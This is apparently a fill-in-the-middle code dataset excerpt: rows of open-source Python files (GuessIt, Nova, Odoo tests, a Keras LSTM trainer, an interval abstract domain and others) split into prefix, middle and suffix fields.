repo_name (stringlengths 5-100) | path (stringlengths 4-231) | language (stringclasses, 1 value) | license (stringclasses, 15 values) | size (int64, 6-947k) | score (float64, 0-0.34) | prefix (stringlengths 0-8.16k) | middle (stringlengths 3-512) | suffix (stringlengths 0-8.17k) |
---|---|---|---|---|---|---|---|---|
nabsboss/CouchPotatoServer | libs/guessit/language.py | Python | gpl-3.0 | 13,102 | 0.003207 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# GuessIt - A library for guessing information from filenames
# Copyright (c) 2011 Nicolas Wack <wackou@gmail.com>
#
# GuessIt is free software; you can redistribute it and/or modify it under
# the terms of the Lesser GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# GuessIt is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# Lesser GNU General Public License for more details.
#
# You should have received a copy of the Lesser GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import unicode_literals
from guessit import UnicodeMixin, base_text_type, u, s
from guessit.fileutils import load_file_in_same_dir
from guessit.country import Country
import re
import logging
__all__ = [ 'is_iso_language', 'is_language', 'lang_set', 'Language',
'ALL_LANGUAGES', 'ALL_LANGUAGES_NAMES', 'UNDETERMINED',
'search_language' ]
log = logging.getLogger(__name__)
# downloaded from http://www.loc.gov/standards/iso639-2/ISO-639-2_utf-8.txt
#
# Description of the fields:
# "An alpha-3 (bibliographic) code, an alpha-3 (terminologic) code (when given),
# an alpha-2 code (when given), an English name, and a French name of a language
# are all separated by pipe (|) characters."
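# A typical line of that file looks like this (illustrative sample of the format,
# not read from the file here):
#   fre|fra|fr|French|français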
_iso639_contents = load_file_in_same_dir(__file__, 'ISO-639-2_utf-8.txt')
# drop the BOM from the beginning of the file
_iso639_contents = _iso639_contents[1:]
language_matrix = [ l.strip().split('|')
for l in _iso639_contents.strip().split('\n') ]
# update information in the language matrix
language_matrix += [['mol', '', 'mo', 'Moldavian', 'moldave'],
['ass', '', '', 'Assyrian', 'assyrien']]
for lang in language_matrix:
# remove unused languages that shadow other common ones with a non-official form
if (lang[2] == 'se' or # Northern Sami shadows Swedish
lang[2] == 'br'): # Breton shadows Brazilian
lang[2] = ''
# add missing information
if lang[0] == 'und':
lang[2] = 'un'
if lang[0] == 'srp':
lang[1] = 'scc' # from OpenSubtitles
lng3 = frozenset(l[0] for l in language_matrix if l[0])
lng3term = frozenset(l[1] for l in language_matrix if l[1])
lng2 = frozenset(l[2] for l in language_matrix if l[2])
lng_en_name = frozenset(lng for l in language_matrix
for lng in l[3].lower().split('; ') if lng)
lng_fr_name = frozenset(lng for l in language_matrix
for lng in l[4].lower().split('; ') if lng)
lng_all_names = lng3 | lng3term | lng2 | lng_en_name | lng_fr_name
lng3_to_lng3term = dict((l[0], l[1]) for l in language_matrix if l[1])
lng3term_to_lng3 = dict((l[1], l[0]) for l in language_matrix if l[1])
lng3_to_lng2 = dict((l[0], l[2]) for l in language_matrix if l[2])
lng2_to_lng3 = dict((l[2], l[0]) for l in language_matrix if l[2])
# we only return the first given english name, hoping it is the most used one
lng3_to_lng_en_name = dict((l[0], l[3].split('; ')[0])
for l in language_matrix if l[3])
lng_en_name_to_lng3 = dict((en_name.lower(), l[0])
for l in language_matrix if l[3]
for en_name in l[3].split('; '))
# we only return the first given french name, hoping it is the most used one
lng3_to_lng_fr_name = dict((l[0], l[4].split('; ')[0])
for l in language_matrix if l[4])
lng_fr_name_to_lng3 = dict((fr_name.lower(), l[0])
for l in language_matrix if l[4]
for fr_name in l[4].split('; '))
# contains a list of exceptions: strings that should be parsed as a language
# but which are not in an ISO form
lng_exceptions = { 'unknown': ('und', None),
'inconnu': ('und', None),
'unk': ('und', None),
'un': ('und', None),
'gr': ('gre', None),
'greek': ('gre', None),
'esp': ('spa', None),
'español': ('spa', None),
'se': ('swe', None),
'po': ('pt', 'br'),
'pb': ('pt', 'br'),
'pob': ('pt', 'br'),
'br': ('pt', 'br'),
'brazilian': ('pt', 'br'),
'català': ('cat', None),
'cz': ('cze', None),
'ua': ('ukr', None),
'cn': ('chi', None),
'chs': ('chi', None),
'jp': ('jpn', None),
'scr': ('hrv', None)
}
def is_iso_language(language):
return language.lower() in lng_all_names
def is_language(language):
return is_iso_language(language) or language in lng_exceptions
def lang_set(languages, strict=False):
"""Return a set of guessit.Language created from their given string
representation.
if strict is True, then this will raise an exception if any language
could not be identified.
"""
return set(Language(l, strict=strict) for l in languages)
class Language(UnicodeMixin):
"""This class represents a human language.
You can initialize it with pretty much anything, as it knows conversion
from ISO-639 2-letter and 3-letter codes, English and French names.
You can also distinguish languages for specific countries, such as
Portuguese and Brazilian Portuguese.
There are various properties on the language object that give you the
representation of the language for a specific usage, such as .alpha3
to get the ISO 3-letter code, or .opensubtitles to get the OpenSubtitles
language code.
>>> Language('fr')
Language(French)
>>> s(Language('eng').french_name)
'anglais'
>>> s(Language('pt(br)').country.english_name)
'Brazil'
>>> s(Language('Español (Latinoamérica)').country.english_name)
'Latin America'
>>> Language('Spanish (Latin America)') == Language('Español (Latinoamérica)')
True
>>> s(Language('zz', strict=False).english_name)
'Undetermined'
>>> s(Language('pt(br)').opensubtitles)
'pob'
"""
_with_country_regexp = re.compile('(.*)\((.*)\)')
_with_country_regexp2 = re.compile('(.*)-(.*)')
def __init__(self, language, country=None, strict=False, scheme=None):
language = u(language.strip().lower())
with_country = (Language._with_country_regexp.match(language) or
Language._with_country_regexp2.match(language))
if with_country:
self.lang = Language(with_country.group(1)).lang
self.country = Country(with_country.group(2))
return
self.lang = None
self.country = Country(country) if country else None
# first look for scheme specific languages
if scheme == 'opensubtitles':
if language == 'br':
self.lang = 'bre'
return
elif language == 'se':
self.lang = 'sme'
return
elif scheme is not None:
log.warning('Unrecognized scheme: "%s" - Proceeding with standard one' % scheme)
# look for ISO language codes
if len(language) == 2:
self.lang = lng2_to_lng3.get(language)
elif len(language) == 3:
self.lang = (language
if language in lng3
else lng3term_to_lng3.get(language))
else:
self.lang = (lng_en_name_to_lng3.get(language) or
lng_fr_name_to_lng3.get(language))
# general language exceptions
if self.lang is None and language in lng_exceptions:
lang, country = lng_exceptions[language]
self.lang = Language(lang).alpha3
self.country = Country(country) if country else None
msg = 'The give
|
rcbops/nova-buildpackage | nova/api/openstack/compute/contrib/server_start_stop.py | Python | apache-2.0 | 2,721 | 0 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 Midokura Japan K.K.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License
import webob
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova import compute
from nova import exception
from nova import log as logging
LOG = logging.getLogger('nova.api.openstack.compute.contrib.server_start_stop')
class ServerStartStopActionController(wsgi.Controller):
def __init__(self, *args, **kwargs):
super(ServerStartStopActionController, self).__init__(*args, **kwargs)
self.compute_api = compute.API()
@wsgi.action('os-start')
def _start_server(self, req, id, body):
"""Start an instance. """
context = req.environ['nova.context']
try:
LOG.debug(_("start instance %r"),
|
id)
instance = self.compute_api.get(context, id)
self.compute_api.start(context, instance)
except exception.ApiError, e:
raise webob.exc.HTTPBadRequest(explanation=e.message)
except exception.NotAuthorized, e:
raise webob.exc.HTTPUnauthorized()
return webob.Response(status_int=202)
@wsgi.action('os-stop')
def _stop_server(self, req, id, body):
"""Stop an instance."""
context = req.environ['nova.context']
try:
LOG.debug(_("stop instance %r"), id)
instance = self.compute_api.get(context, id)
self.compute_api.stop(context, instance)
except exception.ApiError, e:
raise webob.exc.HTTPBadRequest(explanation=e.message)
except exception.NotAuthorized, e:
raise webob.exc.HTTPUnauthorized()
return webob.Response(status_int=202)
class Server_start_stop(extensions.ExtensionDescriptor):
"""Start/Stop instance compute API support"""
name = "ServerStartStop"
namespace = "http://docs.openstack.org/compute/ext/servers/api/v1.1"
updated = "2012-01-23:00:00+00:00"
def get_controller_extensions(self):
controller = ServerStartStopActionController()
extension = extensions.ControllerExtension(self, 'servers', controller)
return [extension]
|
mod2/momentum | momentum/migrations/0010_target_data_migration.py | Python | mit | 517 | 0.003868 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
def populate_target_amount(apps, schema_editor):
Entry = apps.get_model("momentum", "Entry")
for entry in Entry.objects.all():
entry.target_amount = entry.goal.target_amount
entry.save()
class Migration(migrations.Migration):
dependencies = [
('momentum', '0009_entry_target_amount'),
]
operations = [
migrations.RunPython(populate_target_amount),
]
|
scopatz/regolith | regolith/sorters.py | Python | cc0-1.0 | 2,389 | 0.002093 |
"""Builder for websites."""
import string
from regolith.dates import date_to_float
doc_date_key = lambda x: date_to_float(
x.get("year", 1970), x.get("month", "jan")
)
ene_date_key = lambda x: date_to_float(
x.get("end_year", 4242), x.get("end_month", "dec")
)
category_val = lambda x: x.get("category", "<uncategorized>")
level_val = lambda x: x.get("level", "<no-level>")
id_key = lambda x: x.get("_id", "")
def date_key(x):
if "end_year" in x:
v = date_to_float(
x["end_year"], x.get("end_month", "jan"), x.get("end_day", 0)
)
elif "year" in x:
v = date_to_float(x["year"], x.get("month", "jan"), x.get("day", 0))
elif "begin_year" in x:
v = date_to_float(
x["begin_year"], x.get("begin_month", "jan"), x.get("begin_day", 0)
)
else:
raise KeyError("could not find year in " + str(x))
return v
POSITION_LEVELS = {
"": -1,
"editor": -1,
"unknown": -1,
"undergraduate research assistant": 1,
"intern": 1,
"masters research assistant": 2,
"visiting student": 1,
"graduate research assistant": 3,
"teaching assistant": 3,
"research assistant": 2,
"post-doctoral scholar": 4,
"research fellow": 4,
"assistant scientist": 4,
"assistant lecturer": 4,
"lecturer": 5,
"research scientist": 4.5,
"associate scientist": 5,
"adjunct scientist": 5,
"senior assistant lecturer": 5,
"research associate": 5,
"reader": 5,
"ajunct professor": 5,
"adjunct professor": 5,
"consultant": 5,
"programer": 5,
"programmer": 5,
"visiting scientist": 6,
"research assistant professor": 4,
"assistant profes
|
sor": 8,
"assistant physicist": 8,
"associate professor": 9,
"associate physicist": 9,
"professor emeritus": 9,
"visiting professor": 9,
"manager": 10,
"director": 10,
"scientist": 10,
"engineer": 10,
"physicist": 10,
"professor": 11,
"president": 10,
"distinguished professor": 12
}
def position_key(x):
"""Sorts a people based on thier position in the resear
|
ch group."""
pos = x.get("position", "").lower()
first_letter_last = x.get("name", "zappa").rsplit(None, 1)[-1][0].upper()
backward_position = 26 - string.ascii_uppercase.index(first_letter_last)
return POSITION_LEVELS.get(pos, -1), backward_position
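# Illustrative use (assumed data shape): sorted(people, key=position_key) orders
# entries by POSITION_LEVELS first, so a "graduate research assistant" (level 3)
# sorts before a "professor" (level 11); ties are broken by the reversed
# alphabetical rank of the last-name initial computed above.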
|
pism/pism | doc/acknowledge.py | Python | gpl-3.0 | 3,113 | 0.004497 |
#!/usr/bin/env python3
header = """
..
DO NOT EDIT: This file was automatically generated by running doc/acknowledge.py
Edit doc/acknowledge.py, doc/funding.csv, and doc/citing-pism.bib
"""
acknowledgement = """
Acknowledging PISM funding sources
----------------------------------
If you use PISM in a publication then we ask for an acknowledgement of funding and a
citation. However, unless PISM developers are involved in the preparation of the
publication at the usual co-author level, we do not expect co-authorship on PISM-using
papers.
To acknowledge PISM funding please include the statement:
"""
citing = """
Citing
------
To cite PISM please use at least one of Bueler and Brown (2009) or Winkelmann et al.
(2011), below, as appropriate to the application.
Do not forget to specify the PISM *version* you use. If your results came from source code
modifications to PISM then we request that your publication say so explicitly.
If your study relies heavily on certain PISM sub-models (such as hydrology, calving,
fracture mechanics, thermodynamics) please contact the corresponding author/developer for
information on additional citations.
.. code::
"""
import csv
import time
import sys
import argparse
parser = argparse.ArgumentParser()
parser.description = '''Generate a funding acknowledgment string.'''
parser.add_argument("--manual", action="store_true")
options = parser.parse_args()
year = time.gmtime(time.time())[0]
funding = {}
with open("funding.csv", "r") as f:
reader = csv.reader(f, skipinitialspace=True, quoting=csv.QUOTE_ALL)
funding = {}
for row in reader:
start_year, end_year, agency, number, _ = row
try:
start_year = int(start_year)
end_year = int(end_year)
except:
continue
# skip grants for which we don't have a number (yet)
if number.strip() == "":
continue
if start_year <= year and year <= end_year:
try:
funding[agency].append(number)
except:
funding[agency] = [number]
def join(strings):
assert len(strings) > 0
if len(strings) == 1:
return strings[0]
elif len(strings) == 2:
return "{} and {}".format(strings[0], strings[
|
1])
else:
return join(["{}, {}".format(strings[0], strings[1]),
join(strings[2:])])
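# Worked example of the recursion above (grant numbers are hypothetical):
#   join(["A-1"])               -> "A-1"
#   join(["A-1", "B-2"])        -> "A-1 and B-2"
#   join(["A-1", "B-2", "C-3"]) -> "A-1, B-2 and C-3"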
grants = []
for k, v in funding.items():
grant = "grant"
if len(v) > 1:
grant = "grants"
grants.append("{agency} {grant} {number}".format(agency=k,
grant=grant,
number=join(v)))
if options.manual:
print(header)
print("""
Development of PISM is supported by {grants}.""".format(grants=join(grants)))
else:
print(header)
print(acknowledgement)
print("""
Development of PISM is supported by {grants}.
""".format(grants=join(grants)))
print(citing)
with open("citing-pism.bib") as f:
for line in f:
sys.stdout.write(" {}".format(line))
|
be-cloud-be/horizon-addons | server-tools/database_cleanup/tests/test_database_cleanup.py | Python | agpl-3.0 | 4,939 | 0 |
# -*- coding: utf-8 -*-
# © 2016 Therp BV <http://therp.nl>
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).
from psycopg2 import ProgrammingError
from openerp.modules.registry import RegistryManager
from openerp.tools import config
from openerp.tests.common import TransactionCase, at_install, post_install
# Use post_install to get all models loaded more info: odoo/odoo#13458
@at_install(False)
@post_install(True)
class TestDatabaseCleanup(TransactionCase):
def setUp(self):
super(TestDatabaseCleanup, self).setUp()
self.module = None
self.model = None
def test_database_cleanup(self):
# create an orphaned column
self.cr.execute(
'alter table res_partner add column database_cleanup_test int')
# We need use a model that is not blocked (Avoid use res.users)
partner_model = self.env['ir.model'].search([
('model', '=', 'res.partner')], limit=1)
purge_columns = self.env['cleanup.purge.wizard.column'].create({
'purge_line_ids': [(0, 0, {
'model_id': partner_model.id, 'name': 'database_cleanup_test'}
)]})
purge_columns.purge_all()
# must be removed by the wizard
with self.assertRaises(ProgrammingError):
with self.registry.cursor() as cr:
cr.execute('select database_cleanup_test from res_partner')
# create a data entry pointing nowhere
self.cr.execute('select max(id) + 1 from res_users')
self.env['ir.model.data'].create({
'module': 'database_cleanup',
'name': 'test_no_data_entry',
'model': 'res.users',
'res_id': self.cr.fetchone()[0],
})
purge_data = self.env['cleanup.purge.wizard.data'].create({})
purge_data.purge_all()
# must be removed by the wizard
with self.assertRaises(ValueError):
self.env.ref('database_cleanup.test_no_data_entry')
# create a nonexistent model
self.model = self.env['ir.model'].create({
'name': 'Database cleanup test model',
'model': 'x_database.cleanup.test.model',
})
self.env.cr.execute(
'insert into ir_attachment (name, res_model, res_id, type) values '
"('test attachment', 'database.cleanup.test.model', 42, 'binary')")
self.registry.models.pop('x_database.cleanup.test.model')
self.registry._pure_function_fields.pop(
'x_database.cleanup.test.model')
purge_models = self.env['cleanup.purge.wizard.model'].create({})
with self.assertRaisesRegexp(KeyError,
'x_database.cleanup.test.model'):
# TODO: Remove with-assert of KeyError after fix:
# https://github.com/odoo/odoo/pull/13978/files#r88654967
purge_models.purge_all()
# must be removed by the wizard
self.assertFalse(self.env['ir.model'].search([
('model', '=', 'x_database.cleanup.test.model'),
]))
# create a nonexistent module
self.module = self.env['ir.module.module'].create({
'name': 'database_cleanup_test',
'state': 'to upgrade',
})
purge_modules = self.env['cleanup.purge.wizard.module'].create({})
# this reloads our registry, and we don't want to run tests twice
# we also need the original registry for further tests, so save a
# reference to it
original_registry = RegistryManager.registries[self.env.cr.dbname]
config.options['test_enable'] = False
purge_modules.purge_all()
config.options['test_enable'] = True
# must be removed by the wizard
self.assertFalse(self.env['ir.module.module'].search([
('name', '=', 'database_cleanup_test'),
]))
# reset afterwards
RegistryManager.registries[self.env.cr.dbname] = original_registry
# create an orphaned table
self.env.cr.execute('create table database_cleanup_test (test int)')
purge_tables = self.env['cleanup.purge.wizard.table'].create({})
purge_tables.purge_all()
with self.assertRaises(ProgrammingError):
with self.registry.cursor() as cr:
self.env.cr.execute('select * from database_cleanup_test')
def tearDown(self):
super(TestDatabaseCleanup, self).tearDown()
with self.registry.cursor() as cr2:
# Release blocked tables with pending deletes
self.env.cr.rollback()
if self.module:
cr2.execute(
"DELETE FROM ir_module_module WHERE id=%s",
(self.module.id,))
if self.model:
cr2.execute(
"DELETE FROM ir_model WHERE id=%s",
(self.model.id,))
cr2.commit()
|
gleitz/howdoi | howdoi/__main__.py | Python | mit | 63 | 0 |
from .howdoi import command_line_runner
command_line_runner()
|
dev-coop/meancoach | meancoach_project/apps/meancoach/tests/smoke_tests.py | Python | mit | 258 | 0 |
from django.core.urlresolvers import reverse
from django.test import TestCase
class SmokeTestMeanCoach(TestCase):
def test_index_page_returns_200(self):
resp = self.client.get(reverse('meancoach:index'))
assert resp.status_code == 200
|
antoinedube/numeric-cookiecutter | {{cookiecutter.namespace+'.'+cookiecutter.project_slug}}/{{cookiecutter.project_slug}}/commands/configure.py | Python | gpl-3.0 | 571 | 0.003503 |
#!/usr/bin/python
# coding: utf8
import os
import subprocess
from '{% if cookiecutter.namespace %}{{ cookiecutter.namespace }}.{{ cookiecutter.project_slug }}{% else %}{{ cookiecutter.project_slug }}{% endif %}'.commands.base import BaseCommand
from '{% if cookiecutter.namespace %}{{ cookiecutter.namespace }}.{{ cookiecutter.project_slug }}{% else %}{{ cookiecutter.project_slug }}{% endif %}' import PROJECT_DIR
class Configure(BaseCommand):
def execute(self):
os.chdir(os.path.join(PROJECT_DIR, 'build'))
subprocess.run(['cmake', PROJECT_DIR])
|
QCaudron/ivanatrumpalot | code/train_lstm.py | Python | mit | 5,169 | 0.003289 |
import os  # needed for the os.chdir() call below
import sys
import re
import numpy as np
import json
import pickle
from string import ascii_letters
from keras.models import Sequential, model_from_json
from keras.layers import Dense, Activation, Dropout
from keras.layers import LSTM
from ivanatrumpalot import clean_text, predict, sample
# This code is heavily influenced by the Keras example code on LSTM for text generation :
# https://github.com/fchollet/keras/blob/master/examples/lstm_text_generation.py
# USAGE :
# python train_lstm.py [mode]
# If no arguments are passed, this will train a new model, saving the model's architecture
# to model.json and its weights to weights.h5.
# If [mode] is passed, valid options are "extend" and "predict".
# If the string "extend" is passed, they must be the files saved by train_lstm.py previously.
# If the string "predict" is passed,
# Code directory
os.chdir("/root/ivanatrumpalot/code")
# Read and clean corpus
text = clean_text(open("../data/trump_corpus").read())
# Corpus length
print("Corpus : {} characters, approximately {} sentences.".format(len(text), len(text.split("."))))
# Generate a dictionaries mapping from characters in our alphabet to an index, and the reverse
alphabet = set(text).union(set(ascii_letters)).union(set("1234567890"))
alphabet_size = len(alphabet)
alphabet_indices = dict((c, i) for i, c in enumerate(alphabet))
indices_alphabet = dict((i, c) for i, c in enumerate(alphabet))
print("Size of the alphabet : {} characters.".format(alphabet_size))
# Generate sequences of characters that the RNN will use to predict the next character.
primer_length = 50
step = 3
sentences = []
next_character = []
for i in range(0, len(text) - primer_length, step):
sentences.append(text[i : i + primer_length])
next_character.append(text[i + primer_length])
print("Number of sequences generated from the corpus : {}.".format(len(sentences)))
# Vectorise the text sequences : go from N sentences of length primer_length to
# a binary array of size (N, primer_length, alphabet_size). Do the same for the
# next_character array.
print("Vectorising.")
X = np.zeros((len(sentences), primer_length, alphabet_size), dtype=np.bool)
y = np.zeros((len(sentences), alphabet_size), dtype=np.bool)
for i, sentence in enumerate(sentences):
for t, char in enumerate(sentence):
X[i, t, alphabet_indices[char]] = 1
y[i, alphabet_indices[next_character[i]]] = 1
# Pickle the necessary objects for future prediction
required_objects = { "alphabet" : alphabet,
"alphabet_indices" : alphabet_indices,
"indices_alphabet" : indices_alphabet,
"primer_length" : primer_length
}
with open("required_objects.pickle", "wb") as f:
pickle.dump(required_objects, f)
# The current model is a four-layer LSTM network with a dropout layer between each hidden layer.
print("Building the model.")
model = Sequential()
model.add(LSTM(128, return_sequences=True, init="glorot_uniform",
input_shape=(primer_length, len(alphabet))))
model.add(Dropout(0.2))
model.add(LSTM(256, return_sequences=True, init="glorot_uniform"))
model.add(Dropout(0.2))
model.add(LSTM(512, return_sequences=True, init="glorot_uniform"))
model.add(Dropout(0.2))
model.add(LSTM(512, return_sequences=False, init="glorot_uniform"))
model.add(Dropout(0.2))
model.add(Dense(len(alphabet)))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam')
model.summary()
# Train the model for 250 epochs, outputting some generated text every five iterations
# Save the model every five epochs, just in case training is interrupted
for iteration in range(1, 50):
print("\n" + "-" * 50)
print("Iteration {}".format(iteration))
# Train the model for five epochs
model.fit(X, y, batch_size=128, nb_epoch=5, shuffle=True)
# Pick a random part of the text to use as a prompt
start_index = np.random.randint(0, len(text) - primer_length - 1)
# For various energies in the probability distribution,
# create some 200-character sample strings
for diversity in [0.2, 0.5, 1.0, 1.2]:
print("\n----- Diversity : {}".format(diversity))
generated = ""
sentence = text[start_index : start_index + primer_length]
generated += sentence
print("----- Generating with prompt : {}".format(sentence))
sys.stdout.write(generated)
# Generate 100 characters
for i in range(100):
x = np.zeros((1, primer_length, len(alphabet)))
for t, char in enumerate(sentence):
x[0, t, alphabet_indices[char]] = 1.
predictions = model.predict(x, verbose=0)[0]
next_index = sample(predictions, diversity)
next_char = indices_alphabet[next_index]
generated += next_char
sentence = sentence[1:] + next_char
sys.stdout.write(next_char)
sys.stdout.flush()
print("\n")
# Save the model architecture and weights to file
model.save_weights("weights.h5", overwrite=True)
with open("model.json", "w") as f:
f.write(model.to_json())
|
hksonngan/pynopticon | src/pynopticon/link_to_orange.py | Python | gpl-3.0 | 628 | 0.012739 |
import os.path
import shutil
try:
import OWGUI
except ImportError:
print "Orange could not be imported."
try:
import pynopticon
except ImportError:
print "Pynopticon could not be imported, you need to install it first."
def link_to_orange():
orangeWidgetsPath = os.path.join(os.path.split(OWGUI.__file__)[0], 'Pynopticon')
pncWidgetsPath = os.path.join(pynopticon.__path__[0], 'widgets')
print "Copying pynopticon widgets to orange widgets directory..."
shutil.copytree(pncWidgetsPath, orangeWidgetsPath)
print "Successful"
if __name__=='__main__':
link_to_orange()
|
Krigu/python_fun | Pland1/Parser.py | Python | gpl-3.0 | 1,456 | 0.000687 |
from collections import defaultdict
def check_for_hits(planets, counts):
total = 0
for planet in planets():
if counts(planet):
total += 1
return total
def parse():
actions = {"U": (lambda: map_x[x], lambda j: j > y),
"D": (lambda: map_x[x], lambda j: j < y),
"L": (lambda: map_y[y], lambda j: j < x),
"R": (lambda: map_y[y], lambda j: j > x) }
for x in range(1, 8):
file_name = "%02d" % x
input_file = open(file_name + ".in")
lines = input_file.read().splitlines()
planets, ships = lines[0].split(" ")
map_x = defaultdict(list)
map_y = defaultdict(list)
for i in range(1, int(planets) + 1):
x, y = [int(k) for k in lines[i].split(" ")]
map_x[x] += [y]
map_y[y] += [x]
start = int(planets) + 1
hit_list = []
for i in range(start, start + int(ships)):
x, y, direction = lines[i].split(" ")
x, y = int(x), int(y)
action = actions.get(direction)
if not action:
    raise ValueError("Invalid direction value %s" % direction)
hits = check_for_hits(action[0], action[1])
hit_list.append(hits)
output_file = open(file_name + ".out")
should_be = [int(k) for k in output_file.readlines()]
assert hit_list == should_be
if __name__ == '__main__':
parse()
|
stonestone/stonefreedomsponsors | djangoproject/core/views/watch_views.py | Python | agpl-3.0 | 558 | 0.003584 |
# Create your views here.
from django.contrib.auth.decorators import login_required
from core.models import *
from django.http import HttpResponse
from core.services import watch_services
from django.utils.translation import ugettext as _
@login_required
def watchIssue(request, issue_id):
watch_services.watch_issue(request.user, int(issue_id), Watch.WATCHED)
return HttpResponse('WATCHING')
@login_required
def unwatchIssue(request, issue_id):
watch_services.unwatch_issue(request.user, int(issue_id))
return HttpResponse('NOT_WATCHING')
|
gitsimon/spadup-lyra | abstract_domains/numerical/interval_domain.py | Python | mpl-2.0 | 13,333 | 0.001876 |
from copy import deepcopy
from math import inf
from numbers import Number
from typing import List, Union
from abstract_domains.lattice import BottomMixin
from abstract_domains.numerical.numerical import NumericalMixin
from abstract_domains.state import State
from abstract_domains.store import Store
from core.expressions import *
from core.expressions_tools import ExpressionVisitor
def _auto_convert_numbers(func):
def func_wrapper(self, other: Union[Number, 'Interval']):
if isinstance(other, Number):
other = Interval(other, other)
return func(self, other)
return func_wrapper
def _check_types(func):
def func_wrapper(self, other: 'Interval'):
if not issubclass(self.__class__, Interval) or not issubclass(other.__class__, Interval):
return NotImplemented
return func(self, other)
return func_wrapper
def _check_non_empty(func):
def func_wrapper(self, other: 'Interval'):
if self.empty() or other.empty():
raise ValueError("Empty intervals are not comparable!")
return func(self, other)
return func_wrapper
class Interval:
def __init__(self, lower=-inf, upper=inf):
"""Create an interval lattice for a single variable.
"""
super().__init__()
assert lower is not None and upper is not None
self._lower = lower
self._upper = upper
@staticmethod
def from_constant(constant):
interval = Interval(constant, constant)
return interval
@property
def lower(self):
if self.empty():
return None
else:
return self._lower
@lower.setter
def lower(self, b):
assert b is not None
self._lower = b
@property
def upper(self):
if self.empty():
return None
else:
return self._upper
@upper.setter
def upper(self, b):
assert b is not None
self._upper = b
@property
def interval(self):
if self.empty():
return None
else:
return self.lower, self.upper
@interval.setter
def interval(self, bounds):
(lower, upper) = bounds
self.lower = lower
self.upper = upper
def empty(self) -> bool:
"""Return `True` if this interval is empty."""
return self._lower > self._upper
def set_empty(self) -> 'Interval':
"""Set this interval to be empty."""
self.interval = (1, 0)
return self
def finite(self) -> bool:
"""Return `True` if this interval is finite."""
return not ({self.lower, self.upper} & {-inf, inf})
def is_constant(self) -> bool:
"""Return `True` if this interval is equal to a single constant (different from infinity)."""
return self.lower == self.upper
@_check_types
def __eq__(self, other: 'Interval'):
return repr(self) == repr(other)
@_check_types
def __ne__(self, other: 'Interval'):
return not (self == other)
@_auto_convert_numbers
@_check_types
@_check_non_empty
def __lt__(self, other):
return self.upper < other.lower
@_auto_convert_numbers
@_check_types
@_check_non_empty
def __le__(self, other):
return self.upper <= other.lower
@_auto_convert_numbers
@_check_types
@_check_non_empty
def __gt__(self, other):
return self.lower > other.upper
@_auto_convert_numbers
@_check_types
@_check_non_empty
def __ge__(self, other):
return self.lower >= other.upper
def __hash__(self):
return hash(repr(self))
def __repr__(self):
if self.empty():
return "∅"
else:
return f"[{self.lower},{self.upper}]"
# operators (they mutate self, no copy is made!!)
@_auto_convert_numbers
@_check_types
def add(self, other: Union['Interval', int]) -> 'Interval':
if self.empty() or other.empty():
return self.set_empty()
else:
self.interval = (self.lower + other.lower, self.upper + other.upper)
return self
@_auto_convert_numbers
@_check_types
def sub(self, other: Union['Interval', int]) -> 'Interval':
if self.empty() or other.empty():
return self.set_empty()
else:
self.interval = (self.lower - other.upper, self.upper - other.lower)
return self
@_auto_convert_numbers
@_check_types
def mult(self, other: Union['Interval', int]) -> 'Interval':
if self.empty() or other.empty():
return self.set_empty()
else:
comb = [self.lower * other.lower, self.lower * other.upper, self.upper * other.lower,
self.upper * other.upper]
self.interval = (min(comb), max(comb))
return self
def negate(self) -> 'Interval':
if self.empty():
return self
else:
self.interval = (-self.upper, -self.lower)
return self
# overload operators (do not mutate self, return a modified copy)
def __pos__(self):
copy = deepcopy(self)
return copy
def __neg__(self):
copy = deepcopy(self)
return copy.negate()
def __add__(self, other):
copy = deepcopy(self)
return copy.add(other)
def __sub__(self, other):
copy = deepcopy(self)
return copy.sub(other)
def __mul__(self, other):
copy = deepcopy(self)
return copy.mult(other)
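# A small illustration of the semantics implemented above (values follow directly
# from add/sub/mult):
#   Interval(1, 3) + Interval(2, 5)   -> [3,8]
#   Interval(1, 3) - Interval(2, 5)   -> [-4,1]
#   Interval(1, 3) * Interval(-2, 2)  -> [-6,6]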
class IntervalLattice(Interval, BottomMixin):
@staticmethod
def from_constant(constant):
interval_lattice = IntervalLattice(constant, constant)
return interval_lattice
def __repr__(self):
if self.is_bottom():
return "⊥"
else:
return super().__repr__()
def top(self) -> 'IntervalLattice':
self.lower = -inf
self.upper = inf
return self
def is_top(self) -> bool:
return self._lower == -inf and self._upper == inf
def is_bottom(self) -> bool:
# we have to check if interval is empty, or got empty by an operation on this interval
if self.empty():
self.bottom()
return super().is_bottom()
def _less_equal(self, other: 'IntervalLattice') -> bool:
# NOTE: do not use less equal operator of plain interval since that has different semantics (every value in
# interval is less equal than any value in other interval)
return other.lower <= self.lower and self.upper <= other.upper
def _meet(self, other: 'IntervalLattice'):
self.lower = max(self.lower, other.lower)
self.upper = min(self.upper, other.upper)
return self
def _join(self, other: 'IntervalLattice') -> 'IntervalLattice':
self.lower = min(self.lower, other.lower)
self.upper = max(self.upper, other.upper)
return self
def _widening(self, other: 'IntervalLattice'):
if other.lower < self.lower:
self.lower = inf
if other.upper > self.upper:
self.upper = inf
return self
@classmethod
def evaluate(cls, expr: Expression):
"""Evaluates an expression without variables, interpreting constants in the interval domain.
If this method encounters any variables, it raises a ``ValueError``.
"""
return cls._visitor.visit(expr)
# noinspection PyPep8Naming
class Visitor(ExpressionVisitor):
"""A visitor to abstractly evaluate an expression (without variables) in the interval domain."""
def generic_visit(self, expr, *args, **kwargs):
raise ValueError(
f"{type(self)} does not support generic visit of expressions! "
f"Define handling for expression {type(expr)} explicitly!")
